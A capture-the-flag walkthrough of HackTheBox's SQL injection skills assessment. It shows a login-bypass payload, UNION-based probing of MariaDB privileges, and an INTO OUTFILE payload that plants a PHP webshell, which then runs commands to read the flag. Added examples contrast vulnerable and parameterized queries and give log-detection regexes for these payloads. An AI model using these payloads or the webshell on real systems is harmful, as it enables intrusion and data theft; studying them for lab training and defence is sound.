HackTheBox - SQL Injection Fundamentals - Skills Assessment Walkthrough


Scenario
The company Inlanefreight has contracted you to perform a web application assessment against one of their public-facing websites. In light of a recent breach of one of their main competitors, they are particularly concerned with SQL injection vulnerabilities and the damage the discovery and successful exploitation of this attack could do to their public image and bottom line.
They provided a target IP address and no further information about their website. Perform a full assessment of the web application from a "grey box" approach, checking for the existence of SQL injection vulnerabilities.
Find the vulnerabilities and submit a final flag using the skills we covered to complete this module. Don't forget to think outside the box!
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system.
Walkthrough
Navigating to the target URL displays a login screen:
We can guess the structure of the SQL query behind the login form and try to bypass it with SQL injection. It might look like:
SELECT username FROM users WHERE username='<USERNAME_INPUT>' AND password='<PASSWORD_INPUT>';
Injecting a payload into the username parameter can bypass authentication if it closes the quoted string, makes the WHERE condition always true so the query always returns a row, and comments out the rest of the query (including the password check):
' OR '1'='1'-- -
The resulting query would then look like:
SELECT username FROM users WHERE username='' OR '1'='1'-- -' AND password='<PASSWORD_INPUT>';
It worked!
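To show why the bypass above works and how the login should have been written, here is an added example (not code from the walkthrough or the target application) that builds a throwaway in-memory SQLite table with an assumed users schema and runs the walkthrough's payload against a concatenated query and a parameterized one:

```python
import sqlite3

# Constructed in-memory users table standing in for the target's database
# (assumed schema; the walkthrough never shows the real one).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return db

def login_vulnerable(db, username, password):
    # String concatenation: the user's input becomes part of the SQL text,
    # so a quote in the input changes the structure of the query.
    query = (f"SELECT username FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    # SQLite treats "-- " as a line comment, as MariaDB does for "-- -",
    # so everything after the payload (the password check) is discarded.
    return db.execute(query).fetchone() is not None

def login_parameterized(db, username, password):
    # Placeholders: the driver sends the values separately from the SQL text,
    # so the payload is compared as a literal username and never matches.
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None

BYPASS_PAYLOAD = "' OR '1'='1'-- -"   # the payload used in the walkthrough

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, BYPASS_PAYLOAD, "anything"))      # True
    print(login_parameterized(db, BYPASS_PAYLOAD, "anything"))   # False
    print(login_parameterized(db, "admin", "S3cret!"))            # True
```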
We enter the next page, where we can see a table of payroll information with 2 rows:
We have a search functionality, so let's check whether it is vulnerable to SQL injection by entering a single quote ('):
Our input appears to break the SQL query, returning an error that reveals the use of MariaDB (a fork of MySQL), allowing us to use MySQL syntax for the injection.
With output returned, we can use a UNION-based SQL injection.
Our first step is to identify how many columns the query returns.
Using the ORDER BY technique, we inject ORDER BY <COL_NUM> starting at 1 and increment until an error appears. The last valid number is the query's column count.
Success (ORDER BY 1):
Fail (ORDER BY 10):
After a few attempts, we found that the query returns 5 columns.
Next, we’ll test the UNION SELECT injection and identify which of the 5 columns (only 4 displayed) are accessible. Our payload:
' UNION SELECT 1, 2, 3, 4, 5 -- -
We can see that columns 2, 3, 4, and 5 are displayed:
From here, we can continue using UNION-based SQL injection to extract more data from the server - databases, tables, users, sensitive information and more.
Our current goal is to achieve RCE on the server, so we will focus on writing a file.
To do this, we first need information about the current user and its capabilities.
Retrieve the current user executing the queries on the server:
' UNION SELECT 1, user(), 3, 4, 5-- -
The current user is root.
Get the Super_priv value for user 'root' from the mysql.user table:
' UNION SELECT 1, super_priv, 3, 4, 5 FROM mysql.user WHERE user="root"-- -
The value 'Y' indicates that the root user has broad privileges on the MySQL server.
Retrieve the system privileges of the user 'root':
' UNION SELECT 1, grantee, privilege_type, is_grantable, 5 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
Specifically, we check for privilege_type = FILE and is_grantable = YES, which means the current user can read and write files on the system:
Finally, we check the value of the global variable secure_file_priv:
' UNION SELECT 1, variable_name, variable_value, 4, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
An empty (NULL) value indicates that there are no directory restrictions on file read and write operations.
After validating the current user’s capabilities, we are ready to create the webshell file and execute commands through it.
The web application is built with PHP, so we will inject the following payload into the search bar, which contains PHP webshell code:
' UNION SELECT 1, '<?php system($_REQUEST[cmd]); ?>',3, 4, 5 INTO OUTFILE '/var/www/html/dashboard/webshell.php'-- -
Enter the path where the file was written and add the cmd URL parameter with the command ls to list the contents of the current directory:
http[:]//94.237.123.233:59444/dashboard/webshell.php?cmd=ls
Next, after a few checks, we found the flag file in the root directory:
http[:]//94.237.123.233:59444/dashboard/webshell.php?cmd=ls+/
Let's output the content using cat /flag_cae1dadcd174.txt:
http[:]//94.237.123.233:59444/dashboard/webshell.php?cmd=cat+/flag_cae1dadcd174.txt
And found the flag 😁
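From the defender's side, every step of this chain passed through the web server's access log. The following added example (not part of the walkthrough) scans constructed Apache-style log lines modelled on the requests above for the UNION SELECT, INTO OUTFILE, comment-terminator and PHP-tag patterns they contain, and for follow-up requests to a .php file with a cmd parameter; the client IPs and timestamps are invented, the paths and flag name are the walkthrough's:

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on this walkthrough's requests
# (paths, payloads and flag name from the post; client IPs and times invented).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dashboard/?search=%27+UNION+SELECT+1%2C+user%28%29%2C+3%2C+4%2C+5--+- HTTP/1.1" 200 1843
10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "GET /dashboard/?search=%27+UNION+SELECT+1%2C+%27%3C%3Fphp+system%28%24_REQUEST%5Bcmd%5D%29%3B+%3F%3E%27%2C3%2C+4%2C+5+INTO+OUTFILE+%27%2Fvar%2Fwww%2Fhtml%2Fdashboard%2Fwebshell.php%27--+- HTTP/1.1" 200 1843
10.10.14.5 - - [01/Jan/2024:10:00:15 +0000] "GET /dashboard/webshell.php?cmd=cat+/flag_cae1dadcd174.txt HTTP/1.1" 200 31
192.168.1.20 - - [01/Jan/2024:10:01:00 +0000] "GET /dashboard/?search=Smith HTTP/1.1" 200 2210
"""

# Rule name -> regex applied to the URL-decoded, whitespace-normalised query string.
RULES = {
    "union_select":   re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "into_outfile":   re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "comment_tail":   re.compile(r"--\s|/\*"),
    "metadata_probe": re.compile(r"\b(mysql\.user|information_schema)\b", re.I),
    "php_tag":        re.compile(r"<\?php", re.I),
}
# Common Log Format: client, ident, user, [time], "METHOD target PROTO" ...
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) ')

def normalise(query):
    # Decode twice: double-encoding is a common way to slip past naive filters.
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded)

def scan_line(line):
    """Return (client_ip, path, [matched_rule_names]) or None if unparseable."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, _method, target = m.groups()
    path, _, query = target.partition("?")   # split before decoding any %3F
    query = normalise(query)
    hits = [name for name, rx in RULES.items() if rx.search(query)]
    # A script dropped with INTO OUTFILE is driven through a command parameter.
    if path.endswith(".php") and re.search(r"(^|&)cmd=", query):
        hits.append("webshell_cmd")
    return ip, path, hits

def scan_log(text):
    """Return only the parsed lines that matched at least one rule."""
    return [r for r in (scan_line(l) for l in text.splitlines()) if r and r[2]]
```

Correlating a query-string hit with a later request to a newly created .php path from the same client, as the last two sample lines show, is the strongest signal of a successful file write.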